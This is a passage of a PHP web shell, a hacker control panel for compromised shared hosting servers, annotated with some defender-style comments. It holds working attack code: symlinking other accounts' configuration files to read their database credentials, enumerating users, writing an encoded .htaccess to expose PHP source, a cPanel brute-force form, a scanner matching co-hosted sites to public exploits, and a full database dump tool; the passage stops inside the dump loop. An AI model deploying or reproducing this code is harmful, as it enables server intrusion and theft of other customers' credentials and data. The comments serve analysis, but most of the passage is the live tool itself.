symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; $temp = trim($temp); $file5 = 
fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  2078. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  2079. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  2080. '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
  2081. <form method="POST" target="_blank">
  2082.     <strong>
  2083. <input name="page" type="hidden" value="find"><table>                  
  2084.     </strong><br><br><center><font size="5" style="italic" color="#FF0000">--==[ Cpanel BruteForce ]==--</font></center><br><br>
  2085.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  2086.     <tr>
  2087.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2088.     <center><b><font size="5" style="italic" color="#FF0000">Cpanel BruteForce</font></b></center></td></tr>
  2089.     <tr>
  2090.     <td>
  2091.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  2092.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2093.     <strong>User :</strong></td>
  2094.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php /* Runs `ls /var/mail` through system(); the command output is emitted at this point, i.e. inside the "usernames" textarea of this form. Detection: the web server's PHP process spawning ls against /var/mail. Hardening: list system() in disable_functions and keep /var/mail unreadable to the web user. */ system('ls /var/mail');?></textarea></strong></td>
  2095.     </tr>
  2096.     <tr>
  2097.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2098.     <strong>Pass :</strong></td>
  2099.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  2100.     </tr>
  2101.     <tr>
  2102.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2103.     <strong>Type :</strong></td>
  2104.     <td valign="top" bgcolor="#151515" colspan="5">
  2105.     <span class="style2"><strong>Simple : </strong> </span>
  2106.     <strong>
  2107.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  2108.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  2109.     <strong>
  2110.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  2111.     </strong>
  2112.     </span>
  2113.     </td>
  2114.     </tr>
  2115.     <tr>
  2116.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2117.     <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
  2118.     </strong>
  2119.     </td>
  2120.     <tr>
  2121. </form>
  2122. <tr>
  2123.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
  2124.                     </tr>
  2125. <form method="POST" target="_blank">
  2126.     <strong>
  2127. <input name="mendapatkan" type="hidden" value="passwd">                    
  2128.     </strong>
  2129.     <tr>
  2130.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
  2131.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
  2132.     </strong>
  2133.     </td>
  2134.     </tr>
  2135.     <tr>
  2136.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2137.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  2138.     </strong>
  2139.     </td>
  2140.     <tr>
  2141. </form>  
  2142. <tr>
  2143.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
  2144.                     </tr>
  2145. <form method="POST" target="_blank">
  2146.     <strong>
  2147. <input name="pass" type="hidden" value="password">                     
  2148.     </strong>
  2149.     <tr>
  2150.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
  2151.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
  2152.     </strong>
  2153.     </td>
  2154.     </tr>
  2155.     <tr>
  2156.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2157.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  2158.     </strong>
  2159.     </td>
  2160.     <tr>
  2161. </form>
  2162. <tr>
  2163.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  2164.     Security</strong></td>
  2165.                     </tr>
  2166.     <tr>
  2167.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  2168.     <td valign="top" bgcolor="#151515" colspan="5">
  2169.     <strong>
  2170. <?php /* Prints ON only when ini_get('safe_mode') compares equal to '1', otherwise OFF. safe_mode was removed in PHP 5.4, so on later versions ini_get() has nothing to return and this prints OFF. Defenders should not count on safe_mode; restriction comes from disable_functions, open_basedir and OS-level account isolation. */ $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; } ?>  
  2171.     </strong>  
  2172.     </td>
  2173.                     </tr>
  2174.     <tr>
  2175.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
  2176.     <td valign="top" bgcolor="#151515" colspan="5">
  2177.     <strong>
  2178. <form method="POST" target="_blank">
  2179.     <strong>
  2180. <input name="matikan" type="hidden" value="sekatan">                       
  2181.     </strong>
  2182.  
  2183. <?php /* Reports the disable_functions ini value to the operator. An empty value prints "No Security for Function". Otherwise the list is echoed (unescaped) after a JavaScript alert, followed by a submit button for the enclosing form, whose hidden field is matikan=sekatan; the handler for that field is not in this part of the file. */ if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#FF0000>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
  2184.    </strong>
  2185.    </td></tr>'; } ?></strong></td></tr></table></table></table>
  2186. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor')) { ?>
  2187.     <form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
  2188.     <center><br><br><b>--=[ Tutorial & Ebook hacking ]=--</b><br>
  2189.         <form method="post" action="">
  2190. <table class="tabnet" border="1" >
  2191. <tr>
  2192.         <td align="center">English</td><td align="center">Indonesian</td>
  2193.     </tr>
  2194.     <tr>
  2195.         <td><form method="post" action="">&nbsp;
  2196.     E-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2197.     <select class="inputzbut" name="pilih" id="pilih">
  2198.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2199.     <option value="tutorial24" > Hacking Exposed-5 </option>
  2200.     <option value="tutorial25"> Internet Denial Of Service </option>
  2201.     <option value="tutorial26">Computer Viruses For Dummies</option>
  2202.     <option value="tutorial27">Hack Attacks Testing</option>
  2203.     <option value="tutorial28">Secrets Of A Super Hacker</option>
  2204.     <option value="tutorial29">Stealing The Network</option>
  2205.     <option value="tutorial30">Hacker's HandBook</option>
  2206.     </select>
  2207.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2208.     </td></form>
  2209. <td><form method="post" action="">&nbsp;
  2210. Tutorial &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2211.     <select class="inputzbut"  name="pilih" id="pilih">
  2212.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2213.         <option value="tutorial2">Search Engine Hacking</option>
  2214.         <option value="tutorial3">SQL Injection dengan hackbar</option>
  2215.         <option value="tutorial1" >Bypass Union</option>
  2216.     </select>
  2217.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2218. </form></td>
  2219. </tr>
  2220. <tr>
  2221. <td>
  2222. <form method="post" action="">&nbsp;
  2223. E-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2224.     <select class="inputzbut"  name="pilih" id="pilih">
  2225.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2226.     <option value="cryptography_for_defeloper">Cryptography for Developer</option>
  2227.     <option value="tutorial31">Mobile Malware Attack and Defense</option>
  2228.     <option value="forensic">CD and DVD Forensic</option>
  2229.     <option value="ddd">Open Sourch Security Tools</option>
  2230.     <option value="metasploit">Metaslpoit Toolkit</option>
  2231.     <option value="stealing_network">Stealing the Network</option>
  2232.     <option value="security_polices">Creating Security Polices</option>
  2233.     </select>
  2234.     <input  type="submit" name="submit" class="inputzbut" value="Download">
  2235. </form></td>
  2236. <td>
  2237. <form method="post" action="">&nbsp;
  2238. X-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
  2239.     <select class="inputzbut" name="pilih" id="pilih">
  2240.     <option value=""selected>-----------------[ Select ]-----------------</option>
  2241.     <option value="tutorial4">X-CODE MAGAZINE 1</option>
  2242.     <option value="tutorial5">X-CODE MAGAZINE 2</option>
  2243.     <option value="tutorial6">X-CODE MAGAZINE 3</option>
  2244.     <option value="tutorial7">X-CODE MAGAZINE 4</option>
  2245.     <option value="tutorial8">X-CODE MAGAZINE 5</option>
  2246.     <option value="tutorial9">X-CODE MAGAZINE 6</option>
  2247.     <option value="tutorial10">X-CODE MAGAZINE 7</option>
  2248.     <option value="tutorial11">X-CODE MAGAZINE 8</option>
  2249.     <option value="tutorial12">X-CODE MAGAZINE 9</option>
  2250.     <option value="tutorial13">X-CODE MAGAZINE 10</option>
  2251.     <option value="tutorial14">X-CODE MAGAZINE 11</option>
  2252.     <option value="tutorial15">X-CODE MAGAZINE 12</option>
  2253.     <option value="tutorial16">X-CODE MAGAZINE 13</option>
  2254.     <option value="tutorial17">X-CODE MAGAZINE 14</option>
  2255.     <option value="tutorial18">X-CODE MAGAZINE 15</option>
  2256.     <option value="tutorial19">X-CODE MAGAZINE 16</option>
  2257.     <option value="tutorial20">X-CODE MAGAZINE 17</option>
  2258.     <option value="tutorial21">X-CODE MAGAZINE 18</option>
  2259.     <option value="tutorial22">X-CODE MAGAZINE 19</option>
  2260.     <option value="tutorial23">X-CODE MAGAZINE 20</option>
  2261.     <option value="tutorial024">X-CODE MAGAZINE 21</option>
  2262.     </select>
  2263.     <input type="submit" name="submit" class="inputzbut" value="Download" ></a>
  2264. </form></td></tr></table><br><br>
  2265. <?php /* Download dispatcher for the select forms above. When the POST carries a "submit" value, the chosen "pilih" value is compared by the if/elseif chain that follows, and each match emits a script that sets document.location to a hard-coded external URL. Nothing is fetched or written server-side here; the hosts listed below are third-party locations and should be treated as untrusted. */ $submit = $_POST ['submit']; if(isset($submit)) { $pilih = $_POST['pilih']; if ( $pilih == 'tutorial1') { ?>
  2266.             <script>
  2267.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
  2268.             </script>
  2269.             <?php  } elseif ( $pilih == 'tutorial2') { ?>
  2270.             <script>
  2271.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
  2272.             </script>
  2273.             <?php  } elseif ( $pilih == 'tutorial3') { ?>
  2274.             <script>
  2275.                 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
  2276.             </script>
  2277.             <?php  } elseif ( $pilih == 'tutorial4') { ?>
  2278.             <script>
  2279.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_1.zip';
  2280.             </script>
  2281.             <?php  } elseif ( $pilih == 'tutorial5') { ?>
  2282.             <script>
  2283.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_2.zip';
  2284.             </script>
  2285.             <?php  } elseif ( $pilih == 'tutorial6') { ?>
  2286.             <script>
  2287.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_3.zip';
  2288.             </script>
  2289.             <?php  } elseif ( $pilih == 'tutorial7') { ?>
  2290.             <script>
  2291.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_4.zip';
  2292.             </script>
  2293.             <?php  } elseif ( $pilih == 'tutorial8') { ?>
  2294.             <script>
  2295.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_5.rar';
  2296.             </script>
  2297.             <?php  } elseif ( $pilih == 'tutorial9') { ?>
  2298.             <script>
  2299.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_6.rar';
  2300.             </script>
  2301.             <?php  } elseif ( $pilih == 'tutorial10') { ?>
  2302.             <script>
  2303.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_7.rar';
  2304.             </script>
  2305.             <?php  } elseif ( $pilih == 'tutorial11') { ?>
  2306.             <script>
  2307.                 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_8.rar';
  2308.             </script>
  2309.             <?php  } elseif ( $pilih == 'tutorial12') { ?>
  2310.             <script>
  2311.                 document.location = 'hxxp://xcode.or.id/files/xcode9.zip';
  2312.             </script>
  2313.             <?php  } elseif ( $pilih == 'tutorial13') { ?>
  2314.             <script>
  2315.                 document.location = 'hxxp://xcode.or.id/files/xcode10.zip';
  2316.             </script>
  2317.             <?php  } elseif ( $pilih == 'tutorial14') { ?>
  2318.             <script>
  2319.                 document.location = 'hxxp://xcode.or.id/files/xcode11.zip';
  2320.             </script>
  2321.             <?php  } elseif ( $pilih == 'tutorial15') { ?>
  2322.             <script>
  2323.                 document.location = 'hxxp://xcode.or.id/files/Xcode12.zip';
  2324.             </script>
  2325.             <?php  } elseif ( $pilih == 'tutorial16') { ?>
  2326.             <script>
  2327.                 document.location = 'hxxp://xcode.or.id/files/Xcode13.zip';
  2328.             </script>
  2329.             <?php  } elseif ( $pilih == 'tutorial17') { ?>
  2330.             <script>
  2331.                 document.location = 'hxxp://xcode.or.id/files/Xcode14.zip';
  2332.             </script>
  2333.             <?php  } elseif ( $pilih == 'tutorial18') { ?>
  2334.             <script>
  2335.                 document.location = 'hxxp://xcode.or.id/Xcode15.zip';
  2336.             </script>
  2337.             <?php  } elseif ( $pilih == 'tutorial19') { ?>
  2338.             <script>
  2339.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_16.zip';
  2340.             </script>
  2341.             <?php  } elseif ( $pilih == 'tutorial20') { ?>
  2342.             <script>
  2343.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_17.zip';
  2344.             </script>
  2345.             <?php  } elseif ( $pilih == 'tutorial21') { ?>
  2346.             <script>
  2347.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_18.zip';
  2348.             </script>
  2349.             <?php  } elseif ( $pilih == 'tutorial22') { ?>
  2350.             <script>
  2351.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_19.zip';
  2352.             </script>
  2353.             <?php  } elseif ( $pilih == 'tutorial23') { ?>
  2354.             <script>
  2355.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_20.zip';
  2356.             </script>
  2357.             <?php  } elseif ( $pilih == 'tutorial024') { ?>
  2358.             <script>
  2359.                 document.location = 'hxxp://xcode.or.id/xcode_magazine_21.zip';
  2360.             </script>
  2361.             <?php  } elseif ( $pilih == 'tutorial24') { ?>
  2362.             <script>
  2363.                 document.location = 'hxxp://www.insecure.in/ebooks/hacking_exposed_5.rar';
  2364.             </script>
  2365.             <?php  } elseif ( $pilih == 'tutorial25') { ?>
  2366.             <script>
  2367.                 document.location = 'hxxp://www.insecure.in/ebooks/internet_denial_of_service.rar';
  2368.             </script>
  2369.             <?php  } elseif ( $pilih == 'tutorial26') { ?>
  2370.             <script>
  2371.                 document.location = 'hxxp://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
  2372.             </script>
  2373.             <?php  } elseif ( $pilih == 'tutorial27') { ?>
  2374.             <script>
  2375.                 document.location = 'hxxp://www.insecure.in/ebooks/hack_attacks_testing.rar';
  2376.             </script>
  2377.             <?php  } elseif ( $pilih == 'tutorial28') { ?>
  2378.             <script>
  2379.                 document.location = 'hxxp://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
  2380.             </script>
  2381.             <?php  } elseif ( $pilih == 'tutorial29') { ?>
  2382.             <script>
  2383.                 document.location = 'hxxp://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
  2384.             </script>
  2385.             <?php  } elseif ( $pilih == 'tutorial30') { ?>
  2386.             <script>
  2387.                 document.location = 'hxxp://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
  2388.             </script>
  2389.             <?php  } elseif ( $pilih == 'ddd') { ?>
  2390.             <script>
  2391.                 document.location = 'hxxp://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
  2392.             </script>
  2393.             <?php  } elseif ( $pilih == 'tutorial31') { ?>
  2394.             <script>
  2395.                 document.location = 'hxxp://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
  2396.             </script>
  2397.             <?php  } elseif ( $pilih == 'cryptography_for_defeloper') { ?>
  2398.             <script>
  2399.                 document.location = 'hxxp://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
  2400.             </script>
  2401.             <?php  } elseif ( $pilih == 'forensic') { ?>
  2402.             <script>
  2403.                 document.location = 'hxxp://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
  2404.             </script>
  2405.             <?php  } elseif ( $pilih == 'metasploit') { ?>
  2406.             <script>
  2407.                 document.location = 'hxxp://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
  2408.             </script>
  2409.             <?php  }elseif ( $pilih == 'stealing_network') { ?>
  2410.             <script>
  2411.                 document.location = 'hxxp://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
  2412.             </script>
  2413.             <?php  }elseif ( $pilih == 'security_polices') { ?>
  2414.             <script>
  2415.                 document.location = 'hxxp://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
  2416.             </script>
  2417.             <?php  } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect')) { ?>
  2418.     <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
  2419.     <br><br><br><br><center><b><font size=4>--=[ CMS Detector ]=--</font></b></center><br><br>
  2420.     <?php /* CMS inventory of co-hosted sites. When pee.tmp does not yet exist in the working directory it is created, and if /var/named is readable each entry whose name contains ".db" is reduced to a domain, the owning account is taken from the file owner of /etc/valiases/<domain>, and cms_add() is called once per CMS name with a link built from $pageURL and 'pee/' (cms_add and $pageURL are defined outside this part of the file). When pee.tmp already exists, its content is fetched through $pageURL and echoed. On-disk indicator: a file named pee.tmp next to the script. Mitigation: keep /var/named and /etc/valiases unreadable to site accounts. */ if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>'; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>'; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'jss')) { ?>
  2421.     <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
  2422.     <?php /* Start of the "jss" branch. It prints a form asking for an IP and, on POST, has the server itself query a public search engine for pages on that IP, collect the site URLs, extract component names from each fetched page with three regular expressions (check_com), and look each name up on a public exploit index (check_exploit), printing Found or Not Found. Everything runs through file_get_contents() on remote URLs, so the traffic originates from the compromised host. Detection: outbound HTTP from the web server to search-engine and exploit-index hosts. Mitigation: egress filtering and allow_url_fopen=Off. The branch calls eregi(), which only exists before PHP 7.0. */ echo '
  2423.  
  2424. <br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
  2425. <form method="POST">
  2426.        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
  2427. </form><center>
  2428.  
  2429. '; @set_time_limit(0); @error_reporting(E_ALL | E_NOTICE); function check_exploit($comxx){ $link ="hxxp://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($link); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='hxxp://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>"; }else{ echo"<td><a href='$link'>Found</a></td><td><=</td></tr>"; } } function check_com($url){ $source = @file_get_contents($url); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; check_exploit($comm); } } function sec($site){ preg_match_all('{hxxp://(.*?)(/index.php)}siU',$site, $sites); if(eregi("www",$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); }else{ return $site=str_replace("hxxp://","hxxp://www.",str_replace("index.php","",$sites[0][0])); }} $npages = 50000; if ($_POST) { $ip = trim(strip_tags($_POST['site'])); $npage = 1; $allLinks = array(); while($npage <= $npages) { $x=@file_get_contents('hxxp://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage); if ($x) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink); foreach ($findlink[1] as $fl) $allLinks[]=sec($fl); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0) break; } else break; } $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } echo'<table border="1"  width=\"80%\" align=\"center\">
  2430. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>                    
  2431. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  2432. </table>'; echo "<br><br>"; echo'<table border="1" width="80%" align=\"center\">'; foreach(array_unique($allDmns) as $h3h3){ echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>'; check_com($h3h3); } echo"</table>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
  2433.     <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
  2434.     <?php /* Database dump panel: prints a form for server, username, password, dbname and method (gzip or sql). The password field is a plain text input. */ echo $head.'<p align="center">'; echo '
  2435. <table width=371 class=tabnet >
  2436. <tr><th colspan="2">Database Dump</th></tr>
  2437. <tr>
  2438.     <td>Server </td>
  2439.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  2440.     <td>Username</td>
  2441.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  2442.     <td>Password</td>
  2443.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  2444.     <td>DataBase Name</td>
  2445.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
  2446.     <tr>
  2447.     <td>DB Type </td>
  2448.     <td><form method=post action="'.$me.'">
  2449.     <select class="inputz" name=method>
  2450.         <option  value="gzip">Gzip</option>
  2451.         <option value="sql">Sql</option>
  2452.         </select>
  2453.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  2454.     </form></center></table>'; /* Runs only when username, dbname and method are all non-empty in the POST. The output file, Dump-<dbname>-<Y-m-d>.sql or .sql.gz, is opened by relative name (so in the current working directory) and this branch never deletes it: leftover files matching that pattern are a forensic indicator that data was copied out. $dbname goes into the file name and the SQL text without quoting. */ if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } /* write() appends one chunk to the global $fp handle. */ function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} /* Connects with the legacy mysql_* extension (removed in PHP 7.0) using the posted credentials, then for every table from SHOW TABLES writes its CREATE statement followed by one INSERT per row of SELECT *. Detection on the database side: one session issuing SHOW TABLES and then full-table reads of every table from the web host. Limiting what the application's database account can read limits what this can copy. */ mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = 